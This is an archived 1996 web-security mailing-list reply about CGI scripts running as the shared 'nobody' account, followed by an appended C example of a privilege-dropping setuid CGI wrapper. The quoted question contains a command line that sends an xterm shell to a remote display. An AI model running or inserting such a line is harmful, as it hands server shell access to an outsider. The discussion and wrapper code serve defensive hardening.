[3667] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Dave Dittrich)
Tue Dec 3 16:43:03 1996
Date: Tue, 3 Dec 1996 11:56:07 -0800 (PST)
From: Dave Dittrich <dittrich@cac.washington.edu>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
On Tue, 3 Dec 1996, Andrea Di Fabio wrote:
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the following:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
> I can now pop an xterm on my display as nobody.
> This way any user can gain access to the nobody account and
> have fun with it...
>
> Has this been discussed anywhere?
> Is there a fix out there?
Fabio,
Yes, this is a widespread problem. The solution is to run CGI scripts
as the user's UID, rather than as the server's UID. Until the most
recent beta of Apache, you had to do this with "wrapper" programs that
are setuid root and written carefully.
You cannot solve the problem by simply removing execute permission
from "xterm", since a user can trivially copy their own "xterm" binary
and run that as the server.
Note also that if all user scripts run as the server's UID, you can
trivially implement denial of service attacks on server processes,
read files created by others, and a host of other problems.
--
Dave Dittrich Client Services
dittrich@cac.washington.edu Computing & Communications
University of Washington
Dave Dittrich / dittrich@cac.washington.edu
http://www.washington.edu/People/dad/
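As an added example (not Dave's code and not Apache's own wrapper), here is the shape of a setuid-root CGI wrapper of the kind described above, written the "careful" way: it refuses to run anything as a system account, checks that the script is a regular, non-writable, non-setuid file owned by the target user, drops root to that user in the right order and verifies the drop stuck, then execs the very descriptor it checked with a clean environment. The MIN_UID/MIN_GID cut-off of 1000 and the "uid gid script" command-line convention are assumptions; fexecve() and the glibc feature macro assume Linux.

```c
#define _DEFAULT_SOURCE          /* glibc: declares setgroups() and fexecve() */
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumption: real users have uid/gid >= 1000; anything lower (root, daemon,
   and "nobody" on many systems) is refused outright. */
#define MIN_UID 1000
#define MIN_GID 1000

/* Policy check on the script's stat() data. Pure function, so it can be
   exercised without root. Returns 0 if the script may run as (want_uid,
   want_gid), -1 otherwise. */
int validate_script(const struct stat *st, uid_t want_uid, gid_t want_gid)
{
    if (want_uid < MIN_UID || want_gid < MIN_GID)  return -1; /* never a system account */
    if (!S_ISREG(st->st_mode))                     return -1; /* no dirs, devices, fifos */
    if (st->st_uid != want_uid)                    return -1; /* owner must be the target user */
    if (st->st_gid != want_gid)                    return -1; /* and the target group */
    if (st->st_mode & (S_IWGRP | S_IWOTH))         return -1; /* others could rewrite it */
    if (st->st_mode & (S_ISUID | S_ISGID))         return -1; /* no setuid/setgid scripts */
    if (!(st->st_mode & S_IXUSR))                  return -1; /* must be executable by owner */
    return 0;
}

/* Helper for testing the policy: build a stat record from mode/owner and check it. */
int check_policy(mode_t mode, uid_t owner, gid_t group, uid_t want_uid, gid_t want_gid)
{
    struct stat st;
    memset(&st, 0, sizeof st);
    st.st_mode = mode;
    st.st_uid = owner;
    st.st_gid = group;
    return validate_script(&st, want_uid, want_gid);
}

/* Give up root irrevocably: supplementary groups, then gid, then uid, in that
   order (once uid is dropped the group calls would fail), then prove the drop
   stuck by trying to become root again. Returns 0 on success. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (setgroups(1, &gid) != 0)                  return -1;
    if (setgid(gid) != 0)                         return -1;
    if (setuid(uid) != 0)                         return -1;
    if (getuid() != uid || geteuid() != uid)      return -1;
    if (getgid() != gid || getegid() != gid)      return -1;
    if (setuid(0) == 0)                           return -1; /* root regained: fatal */
    return 0;
}

int main(int argc, char **argv)
{
    struct stat st;
    if (argc != 4) {
        fprintf(stderr, "usage: %s uid gid /path/to/script\n", argv[0]);
        return 2;
    }
    uid_t uid = (uid_t)strtoul(argv[1], NULL, 10);
    gid_t gid = (gid_t)strtoul(argv[2], NULL, 10);

    /* open, then fstat, then exec the same descriptor, so the file that was
       checked is the file that runs (no stat/exec race on the path). */
    int fd = open(argv[3], O_RDONLY);
    if (fd < 0 || fstat(fd, &st) != 0) { perror(argv[3]); return 2; }
    if (validate_script(&st, uid, gid) != 0) {
        fprintf(stderr, "refusing to run %s as %lu:%lu\n", argv[3],
                (unsigned long)uid, (unsigned long)gid);
        return 2;
    }
    if (drop_privileges(uid, gid) != 0) { perror("drop_privileges"); return 2; }

    /* Fresh environment: nothing inherited from the server reaches the script. */
    char *args[] = { argv[3], NULL };
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };
    fexecve(fd, args, envp);
    perror("fexecve");
    return 2;
}
```

Invoked by the server as `wrapper 1001 1001 /home/fabio/cgi-bin/foo.cgi` (constructed values), the script runs as uid 1001, so the xterm trick above only yields that user's own shell, and the cross-user file reads and server-process denial of service Dave mentions are confined to the caller's own account. What the wrapper cannot do is the server-side half: the server must invoke it only for scripts under the owning user's own directory and pass a uid/gid it resolved itself from that location, never values taken from the request.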